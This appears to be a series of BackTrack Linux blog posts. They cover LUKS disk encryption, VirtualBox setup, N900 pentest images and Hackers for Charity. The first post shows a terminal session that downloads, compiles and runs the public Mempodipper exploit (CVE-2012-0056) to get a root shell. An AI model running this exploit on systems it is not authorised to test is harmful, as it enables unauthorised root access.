Backtrack 5 kernel whoops !!

Backtrack 5, and apparently many other kernels of linux >=2.6.39 can be exploited to get root via a Linux Local Privilege Escalation via SUID /proc/pid/mem Write. Read more from blog http://blog.zx2c4.com Exploit code can be obtained here href=”http://www.exploit-db.com/exploits/18411/

chalo@bt:~$ uname -a
Linux bt 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
chalo@bt:~$ wget -c http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
chalo@bt:~$ gcc -o sploit mempodipper.c
chalo@bt:~$ ./sploit
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/12634/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Ptracing su to find next instruction without reading binary.
[+] Resolved exit@plt to 0x8049a30.
[+] Calculating su padding.
[+] Seeking to offset 0x8049a24.
[+] Executing su with shellcode.
sh-4.1# whoami
root

Installing backtrack on encrypted partition with luks

Before you start please note that this process will format any data you have. Have a full backup of your system before you begin. Be sober while you are doing this please. I have tested the tutorial for backtrack 4 pre-final, backtrack 4 final, backtrack 5 and backtrack 5 r1.
Kindly note that my hardisk setup may be different than yours. I want to install backtrack as follows:

/dev/sda1 —– /boot partition
/dev/sda2 —– /root partition

My /root partition will be encrypted with luks such that in order for me to boot, i will have to enter a password.Boot with a live cd and proceed as follows
Kindly remember to change your partitions as necessary

Format the /root partition with luks. Enter the password you want to be using at startup.

root@bt:~# cryptsetup luksFormat /dev/sdXX

Open the partion for mounting. Enter the password you entered above

root@bt:~# cryptsetup luksOpen /dev/sdXX root

Format the container with ext3 filesystem. You can use whichever linux filesystem you are comforable with

root@bt:~# mkfs.ext3 -j -O extent /dev/mapper/root

After this is done, run the backtrack installer(install.sh) on backtrack desktop. Double clicking it should do.
Select your country.
Select the keyboard layout.

Then we now go to partition the disk . Select manual and click next

Select the partition for boot, for me thats /dev/sda1. Click “edit partition” and then set the options. In my options, i use ext3 as the file system, i choose to format the partition and the most important bit is that i set the mountpoint as /boot

Select the partition for root, for me thats /dev/mapper/root. Click “edit partition” and then set the options. In my options, i use ext3 as the file system, i choose to format the partition and the most important bit is that i set the mountpoint as /root

My final setup for the install looks as below. I know, my hardisk is rather small

When you click next, you will get a warning about swapspace. I personally opt not to have swapspace. I have enough memory to run backtrack and a few virtual machines. Click “continue”

The next bit is important. Click “Advanced” .It is the location backtrack will install the bootloader. I usually install the bootloader to hd0 but you can install it to the linux partition. Even if you have windows, you can install the bootloader to hd0, and when it comes time to boot, you will be presented with options as to which os to boot.

You are now set for the install. Click install and wait for the backtrack install to finish. After its done, click the “continue using the live cd”
We need to make a few changes before we exit the live cd

root@bt:~# mkdir /mnt/root
root@bt:~# mount /dev/mapper/root /mnt/root/

Mount the /boot partition

root@bt:~# mount /dev/sdXX /mnt/root/boot
root@bt:~# mount -t proc proc /mnt/root/proc/
root@bt:~# mount -o bind /dev /mnt/root/dev/
root@bt:~# chroot /mnt/root/ /bin/bash

Using a text editor like vi or nano, edit the /etc/crypttab and add the /root partition here

root /dev/sdXX none luks

Using a text editor like vi or nano, edit the /etc/fstab file. Remove any other lines you will find and leave your file in the below order. Replace the XX with your partitions

/dev/mapper/root / ext3 relatime,errors=remount-ro 0 1
/dev/sdXX /boot ext3 defaults 0 0

Using a text editor like vi or nano, edit the /etc/initramfs-tools/modules file and add the following modules to the end of the file

aes-i586
sha256
dm-mod
dm-crypt

Create the new initrd image

root@bt:~# update-initramfs -k all -c

Install grub to your harddisk. Use the device name and not a partition e.g /dev/sda

root@bt:~# grub-install /dev/sdX

root@bt:~# exit

root@bt:~# reboot

Your /root partition should now be encrypted and you will be asked a password when booting to decrypt it.

Credits to esc201, who wrote a good tutorial on encrypting the disk with bt4-prefinal.

Swag 2.0 Beta

Went to Uganda, met Johnny, I let pictures say the rest. But this beats cool at so many levels. thanks for the wonderful time and gifts. He also gave me a coin and the badge for defcon, not included now because they are with a pal. Enjoy the gallery.Its an honor for me

And Johnny is back, what do I mean, he is back to security.Watch this small space. It was a nice cathcup, we spoke of the sweetness of the pwnphone amongst other good things. He is ok, please remember donating to HFC. Ok, enough talk.

Look at this cool dirty security tshirt. Actually I had to put it on on my way back. This just rocks

And a backtrack revolution shirt from the offsec team. Oh my..

And this hackers for charity defcon shirt to top up the collection. This made heads turn in Nairobi when I put it on.

To pwn with pwnimage or not to on the nokia n900

Pwineexpress has just released the pwnimage for the nokian900 to the community. http://www.pwnieexpress.com/pwn_phone.html The pwnimage is an easy to use customized n900 suited for pentests. It contains some tools you would find in backtrack. I got some time today and installed the image to my phone. Below is a screenshot. The question I have is do I use this pwnimage or do I use my manually customized n900

Reasons for the pwnimage
The image comes with presinstalled tools and easy to use shortcuts on the desktop that start applications fast. such as wifizoo,packet injection,sslstrip,metasploit.nmap,fake ap etc. This saves time for any pentester . With just a single click most these tools will run.Its awesome

Reasons against pwnimage
There is a licence agreement that you cannot reverse engineer the software etc which is a little peculiar because most of these software is under gnu or bsd licence.
I try to be paranoid, not running on not so common platforms because of backdoors ,etc

My conclusion: I will use the pwnimage, first it is a really good idea to have your n900 setup in such an easy mode to pwn for any pentest. I remember when backtrack v1 was released back then, some people argued that you could compile all those packages alone. Right now backtrack is the most widely used pentesting distro. Its not that I cannot run ./configure;make;make install or apt-get install, I love spending some sleepless nights trying to tweak my n900, its just the time saved and bringing all these packages together to work perfectly takes skill and takes time.
Several projects have come up such as Neopwn which was a little hypped up but we havent seen anything come out of it. I can run backtrack 5 on my n900 but is is a little too slow and the screen calibration on my n900 is really not just working perfectly.
Aside from the fears i know if we the “community” can really pick up this pwnimage and improve it m sure there`s better things in the future for the n900. Thanks to pwineexpress for releasing this. I choose to pwn.

Pimped by Hackers For Charity

Just back from Uganda where I had gone for some business and also took time to visit Johnny long. He is doing well and his family is ok although he really needs your support. Today is the last day to vote for drobos so keep voting for HFC. http://www.hackersforcharity.org/hackers-for-charity/saving-lives-1-drobo-at-a-time/
I also saw Sophos challenging lulzsec to follow in the way of Johnny long. Wouldnt that be something . http://nakedsecurity.sophos.com/2011/06/16/lulzsec-hackers-heres-a-real-challenge/
It is always a pleasure meeting such a great and humble person like Johnny.Apart from catching up with Johnny and he gave me so much gear and swag. Here are some photos.

Johnny on “the beast”.He was beaten to the finish line by the guy on the far left carrying two bags of charcoal. Its now easier to navigate Jinja with this bike. It was a miracle how Johnny got it, i guess he will soon blog about it.

Johnny`s presentation badge for Shmoocon and notice the cool red blackhat bag.

Shmoo mouse pad

Some hardware hacking stuff, you had to program it to read ninja party to be allowed to the party

This shirt is to kill for.. literally . It is a collectors item that has a different logo at the back. It was specifically for the shmoocon conference. I am honored to get this.

HFC stickers to spread the word to all the world

Installing VirtualBox on Backtrack 5

Backtrack 5 doesnt come with the kernel headers installed.So you will need to download them and then proceed with installing virtualbox. The commands are listed below

root@bt # prepare-kernel-sources
root@bt # cd /usr/src/linux
root@bt # cp -rf include/generated/* include/linux/

After this is done, edit /etc/apt/sources.list as shown below and download virtualbox

root@bt # echo deb http://download.virtualbox.org/virtualbox/debian lucid contrib non-free >> /etc/apt/sources.list

root@bt # wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | sudo apt-key add -

root@bt # apt-get update

root@bt # apt-cache search virtualbox

root@bt # apt-get install virtualbox-4.0

Backtrack5 on the nokia n900

Just managed to get my sweet nokia n900 phone to run Bt5 . For me to write a tutorial on this would be an injustice because the steps have been documented properly in this blog http://pcsci3nce.info/?p=177

Below is a screenshot of my phone.